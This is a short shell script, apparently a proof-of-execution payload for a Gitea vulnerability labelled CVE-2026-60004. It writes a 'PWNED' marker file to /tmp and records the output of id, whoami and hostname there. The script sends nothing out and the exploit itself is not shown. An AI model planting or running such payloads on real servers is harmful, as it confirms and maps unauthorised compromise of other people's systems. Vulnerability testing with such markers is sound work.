7 lines
156 B
Bash
7 lines
156 B
Bash
|
|
#!/bin/sh
|
||
|
|
|
||
|
|
echo PWNED_by_CVE202660004 > /tmp/gitea_pwn_$(date +%s).txt
|
||
|
|
id >> /tmp/gitea_pwn.txt
|
||
|
|
whoami >> /tmp/gitea_pwn.txt
|
||
|
|
hostname >> /tmp/gitea_pwn.txt
|